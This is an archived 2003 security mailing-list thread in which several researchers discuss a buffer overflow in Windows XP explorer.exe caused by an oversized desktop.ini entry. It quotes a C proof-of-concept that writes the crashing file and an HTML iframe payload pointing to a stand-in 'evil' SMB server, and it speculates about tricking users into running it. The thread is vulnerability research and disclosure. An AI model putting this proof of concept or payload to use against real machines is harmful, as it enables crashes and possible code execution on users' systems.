I have been unable to reproduce it in this fashion; my quick-and-dirty guess is that explorer.exe does not attempt to interpret that file for remote (smb/etc) shares. However, if you do it from a _local_ share.... It still blows up quite nicely. :) Regards, Kristopher On Sun, 2003-05-11 at 13:55, Berend-Jan Wever wrote: > Could this not be done remotely without user interaction except browsing an > evil website by using SMB ? > <HTML><BODY> > <IFRAME src="\\my-evil-server\"> > </BODY></HTML> > You can make IE browse a harddisk which' contents you control... > > I don't have XP so I can't test this. Let me know what you find. > > Cheers, > > Berend-Jan Wever > > ----- Original Message ----- > From: "Kristopher Matthews" <krismat_private> > To: "'Ryan Yagatich'" <ryanyat_private> > Cc: <vuln-devat_private> > Sent: Friday, May 09, 2003 18:42 > Subject: RE: Buffer overflow in Explorer.exe > > > I have tested and duplicated this behavior on a fully patched/updated > Windows XP Pro system. > > 1. The overflow is for that particular key, AFAICT. > 1a. It will not work for the root (c:/) directory; explorer.exe does not > parse 'desktop.ini' for that directory. It will, however, work for any other > directory. > 2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It > looks for all the world like a standard buffer overflow; I believe a more > carefully crafted 'desktop.ini' file could be cause for explorer.exe to > unintentionally execute arbitrary code. > 3. Download and execute untrusted code? Combine this with any of the other > popular expoloits for windows; also, it wouldn't be terribly hard to get a > user to download a 'desktop.ini' file to their "My Documents" directory (in > the guise, of, say, a folder them, which windows does support; e.g. > different background, file layout, etc); bam, whenever they open that > directory, explorer crashes. > > Regards, > Kristopher > > > -----Original Message----- > From: Ryan Yagatich [mailto:ryanyat_private] > Sent: Thursday, May 08, 2003 6:28 PM > To: at4rat_private > Cc: vuln-devat_private > > Hi, > I don't quite understand the purpose behind this code. It creates > a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the > contents of > > [.ShellClassInfo] > AAAAAAAAAAAA {x2301} > > > And then terminates? I don't have a windows machine available to > really explore this any, but what makes that entry in desktop.ini cause > this? Furthermore, is this issue only for that particular key or is it > generally just key/excessive parameter/missing value size that is > affected? And additionally, you mention that explorer will no longer be > able to operate when trying to browse the hard disk, but does this mean > globally, or when they try to browse the c:/ drive, or just that > particular folder? > Please send me more information about this, (even if it references > past posts that I have missed) so that I can better understand the > severity of this. Espcially since to me, I still see it as someone needing > to download and execute untrusted software which causes a system crash, > and if that were going to happen there are far worse things that can be > done besides creating a small text file. > > Thanks, > Ryan Yagatich > > > ,_____________________________________________________, > \ Ryan Yagatich supportat_private \ > / Pantek Incorporated (877) LINUX-FIX / > \ http://www.pantek.com/security (440) 519-1802 \ > / Are your networks secure? Are you certain? / > \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\ > > On Wed, 7 May 2003, aT4r InsaN3 wrote: > > >This bug allow a malicious an attacker to execute data with privileges of a > > >user that is browsing the hard disk with explorer. > > > >tested against winxp SP1 > > > >example code provided. > > > <snip> > > > > strcpy(path,"\\aT4r[at]3WDesign.es Security"); > > mkdir(path); > > SetFileAttributes(path,FILE_ATTRIBUTE_READONLY); > > > > strcat(path,"\\desktop.ini"); > > > bof=fopen(path,"w"); > > fputs("[.ShellClassInfo]\n",bof); > > memset(evil,'A',BUFF); > > fputs(evil,bof); > > fclose(bof); > <snip> > > > > > > >
This archive was generated by hypermail 2b30 : Mon May 12 2003 - 19:52:44 PDT